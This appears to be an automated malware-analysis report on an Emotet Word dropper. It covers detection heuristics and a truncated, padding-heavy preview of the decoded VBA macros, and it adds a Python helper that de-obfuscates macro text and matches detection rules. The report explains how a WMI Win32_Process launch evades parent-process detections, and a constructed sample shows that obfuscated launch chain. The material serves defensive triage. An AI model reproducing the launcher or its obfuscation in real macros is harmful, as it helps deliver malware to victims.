Verdict: MALICIOUS (risk score 242)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1137.001 Office Application Startup: Office Template Macros
- T1059 Command and Scripting Interpreter
ClamAV identifies the sample with the signature Doc.Dropper.Emotet-6960272-0, a known Emotet maldoc dropper. The critical static heuristic is a VBA macro chain that references the WMI Win32_Process class and calls .Create to start a command, the way these droppers launch their next-stage payload without calling Shell(). Because Win32_Process.Create runs inside the WMI provider host, the spawned process has WmiPrvSE.exe as its parent rather than WINWORD.EXE, so detections keyed on Word spawning a shell will not see it. An auto-executing AutoOpen entry point and a GetObject call (the normal way a macro obtains a winmgmts: object) complete the chain.
Heuristics (7)

- ClamAV: Doc.Dropper.Emotet-6960272-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.Emotet-6960272-0.
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
  Document contains VBA macro code.
- VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
  The VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain. The WMI class name is often hidden through string concatenation or helper functions, so match on the normalized (concatenated) string rather than on a literal "Win32_Process".
- AutoOpen macro [high] OLE_VBA_AUTOOPEN
  The project defines Sub autoopen(), which Word runs when the document is opened with macros enabled.
- GetObject call [high] OLE_VBA_GETOBJ
  GetObject call. Combined with a winmgmts: moniker this is how a macro obtains the WMI Win32_Process class without CreateObject.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
  The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this rule is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution; its description assumes no modern VBA project was recovered, but here one was (see macros.bas below), so it is redundant with OLE_VBA_AUTOOPEN and adds no independent evidence.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace that Office writes into any document containing drawing objects; it is not attacker-controlled and should not be treated as an indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31128 bytes | 4f3093ec7f2a34dd95d0f6d69576f287a6a24d536d190bdd3d1d94a8aa2bea8f |
Preview: first 1,000 lines of the extracted script (macros.bas). olevba concatenates every module of the VBA project into this one file, so each `Attribute VB_Name = ...` header starts a new module. The code that runs is in module l4722754 (Sub autoopen, which calls X01_884) and module r71782 (Function X01_884); the Select Case blocks test variables that are never assigned and contain no statements, so they are padding, not logic.

```vb
Attribute VB_Name = "P304821"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "B854667"
Attribute VB_Base = "0{D9D79538-D81B-4838-B66B-653BC7CD7CFF}{89548644-A208-4FD0-98D5-441771F0696E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Z03201"
Attribute VB_Name = "C37266_"
Attribute VB_Name = "c955609"
Attribute VB_Base = "0{9E297354-B15D-484D-BE1D-CB6B3473D2DD}{B47FB3B5-30B4-44BD-AC5F-44FF99E1B652}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "l4722754"
Function F497_66(z64_72)
Select Case n5554069
Case i465376 = b66820 = Sgn(471333696)
Case s7261945 = p89161
Case a504467_ = Log(n36069)
Case J239105 = CBool(451270235)
Case n6_881 = 957082140
Case i3801617 = CDate(v3_2193)
End Select
Select Case Y3_0594
Case Y6613_ = E47130 = Sgn(182332894)
Case c71647 = R47376_
Case n46623 = Log(S7943494)
Case n472_7 = CBool(455423588)
Case O9698_32 = 838331306
Case X536__2 = CDate(w9_432)
End Select
Select Case Q6495_83
Case U32_903 = z8674829 = Sgn(468039462)
Case i2662841 = p443443
Case s91043 = Log(w1433080)
Case j9172563 = CBool(377410670)
Case C5_836_ = 496974668
Case K495__ = CDate(X742764)
End Select
Set F497_66 = CVar(z64_72)
Select Case b52_114
Case d62_87 = k___192 = Sgn(709969944)
Case D_9917 = m52179
Case k0302_1 = Log(s5867_3)
Case P95956 = CBool(855892121)
Case C5742481 = 236360998
Case z2_23326 = CDate(V07769)
End Select
Select Case V216_3
Case p1113571 = z_8__7 = Sgn(122239280)
Case C9947_1 = q754866
Case Z965280 = Log(W63641)
Case J185126 = CBool(897905841)
Case n74256_7 = 117942140
Case f159_85 = CDate(M48245)
End Select
Select Case U7_449
Case b925_199 = a575393_ = Sgn(483630630)
Case U72964 = o71205
Case H8129321 = Log(z43254_7)
Case w86876 = CBool(291986409)
Case L810_13 = 458547345
Case G61904_ = CDate(L933330)
End Select
End Function
Sub autoopen()
Select Case h_09641
Case p7_418 = R5123_ = Sgn(377277628)
Case s46998 = K92527
Case S766_3 = Log(R42056_6)
Case Z8251__ = CBool(30290621)
Case S8395005 = 889515263
Case f29566 = CDate(l0719212)
End Select
Select Case C1040_9
Case s26389 = A6_9_271 = Sgn(964608343)
Case S6_21414 = m6352781
Case P25767 = Log(u43_39)
Case t_508681 = CBool(267674597)
Case T9601268 = 242473150
Case j66_5_7 = CDate(V36987)
End Select
Select Case u_368338
Case h298942 = o133250 = Sgn(56115851)
Case I_501102 = A688875
Case Y846787 = Log(D2925008)
Case j8_345 = CBool(626239198)
Case b661584 = 108196528
Case n355119 = CDate(D90_4208)
End Select
Call X01_884
Select Case i747408_
Case O4470_71 = z36309_ = Sgn(778089229)
Case z_142047 = q00083_
Case o05739 = Log(F97___)
Case S3_517_9 = CBool(596131204)
Case R77705 = 712650870
Case d4078830 = CDate(s0424__)
End Select
Select Case L385843
Case P231831 = i05537 = Sgn(839811757)
Case n_62440 = b023649
Case j8206679 = Log(p_179_)
Case B3002277 = CBool(49099996)
Case W177933 = 187188136
Case z669098 = CDate(O31496)
End Select
End Sub
Attribute VB_Name = "r71782"
Function X01_884()
On Error Resume Next
Select Case C36046
Case L925428 = r32461 = Sgn(73907688)
Case z3453775 = I_01619
Case K171433 = Log(p73684)
Case N97700_ = CBool(264746464)
Case z28386 = 653461758
Case V312_147 = CDate(j46619)
End Select
Select Case R9529912
Case B_8503 = q9378825 = Sgn(210491738)
Case Q359_577 = u8_73094
Case T_6727 = Log(l_4753)
Case f29_3760 = CBool(911317383)
Case w50413 = 639562234
Case k084860 = CDate(Q480438)
```

... (truncated)
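The OLE_VBA_WMI_PROCESS_CREATE and OLE_VBA_AUTOOPEN findings above and the chaff-heavy macro preview call for the same triage step: fold the string concatenation, strip the Select Case padding, and only then match and follow the call chain. The Python below is an added example written for this page; it is not code from the analyzer or from oletools. It operates on text already decoded by olevba, reuses the report's rule identifiers purely as labels, and SAMPLE_VBA is a constructed input modelled on the preview, not an excerpt of the real macros.bas.

```python
"""Triage helper for VBA source decoded by olevba: fold string-concatenation
obfuscation, drop opaque Select Case chaff, then apply the macro heuristics
this report uses (AutoOpen, GetObject, WMI Win32_Process .Create).

Example code added alongside this report. It is not part of the analyzer or
of oletools; the rule names are reused only as labels for the findings."""
import re

# Constructed test input in the style of the macros.bas preview (hypothetical,
# not copied from the sample). The WMI moniker is split across concatenated
# literals and a line continuation, so grepping for "Win32_Process" misses it.
SAMPLE_VBA = '''Attribute VB_Name = "l4722754"
Sub autoopen()
Select Case h_09641
Case p7_418 = R5123_ = Sgn(377277628)
Case S766_3 = Log(R42056_6)
Case S8395005 = 889515263
End Select
Call X01_884
End Sub
Attribute VB_Name = "r71782"
Function X01_884()
On Error Resume Next
Set w = GetObject("winmg" & "mts:" + "win32_" & _
    "Proc" & "ess")
w.Create "cmd /c start something", Null, Null, pid
End Function
'''

# "ab" & "cd"  /  "ab" + "cd"  /  "ab" & _<newline> "cd"   ->   "abcd"
_CONCAT = re.compile(r'"\s*[&+]\s*(?:_\s*)?"')
# One whole (non-nested) Select Case ... End Select block
_SELECT = re.compile(r"^[ \t]*Select Case\b.*?^[ \t]*End Select[ \t]*$",
                     re.S | re.M | re.I)
_PROC_DEF = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)",
                       re.M | re.I)


def fold_concat(src: str) -> str:
    """Join adjacent string literals that were split with & or + so the
    assembled moniker/class name becomes visible as a single literal."""
    return _CONCAT.sub("", src)


def strip_chaff(src: str) -> str:
    """Drop Select Case blocks whose body is only Case headers. They select on
    never-assigned variables and contain no statements, so they are padding.
    Blocks that hold real statements are kept. Nested blocks are not handled."""
    def _decide(m):
        inner = m.group(0).splitlines()[1:-1]
        return "" if all(re.match(r"\s*Case\b", ln) for ln in inner) else m.group(0)
    return _SELECT.sub(_decide, src)


def normalize(src: str) -> str:
    return strip_chaff(fold_concat(src))


def wmi_process_create(src: str) -> bool:
    """OLE_VBA_WMI_PROCESS_CREATE: a winmgmts:/Win32_Process reference plus an
    invocation of .Create. Run it on normalized text, not the raw macro."""
    ref = re.search(r"winmgmts:|win32_process", src, re.I)
    create = re.search(r"\.\s*Create\b", src, re.I)
    return bool(ref and create)


RULES = {
    "OLE_VBA_AUTOOPEN": lambda s: bool(re.search(
        r"\b(?:Sub|Function)\s+(?:AutoOpen|Auto_Open|Document_Open|AutoExec)\b", s, re.I)),
    "OLE_VBA_GETOBJ": lambda s: bool(re.search(r"\bGetObject\s*\(", s, re.I)),
    "OLE_VBA_WMI_PROCESS_CREATE": wmi_process_create,
}


def calls_from(src: str, proc: str) -> list:
    """Names of procedures defined in src that `proc` invokes. With the chaff
    removed this is the real execution chain (here: autoopen -> X01_884)."""
    defined = set(_PROC_DEF.findall(src))
    body = re.search(rf"^\s*(?:Sub|Function)\s+{re.escape(proc)}\b.*?^\s*End (?:Sub|Function)",
                     src, re.S | re.M | re.I)
    if not body:
        return []
    tokens = re.findall(r"\b(\w+)\b", body.group(0))
    return [t for t in dict.fromkeys(tokens) if t in defined and t.lower() != proc.lower()]


def triage(src: str) -> dict:
    norm = normalize(src)
    return {
        "normalized": norm,
        "findings": [name for name, rule in RULES.items() if rule(norm)],
        "autoopen_chain": calls_from(norm, "autoopen"),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(result["normalized"])
    print("findings:", result["findings"])
    print("autoopen ->", result["autoopen_chain"])
```

Matching the raw text fails on purpose: `wmi_process_create(SAMPLE_VBA)` is False because neither `winmgmts:` nor `win32_process` exists as a contiguous string until `fold_concat` has run. Feed the function the `.bas` files olevba writes out, or `olevba --decode` output, and keep the concatenation folding ahead of any keyword rule you add.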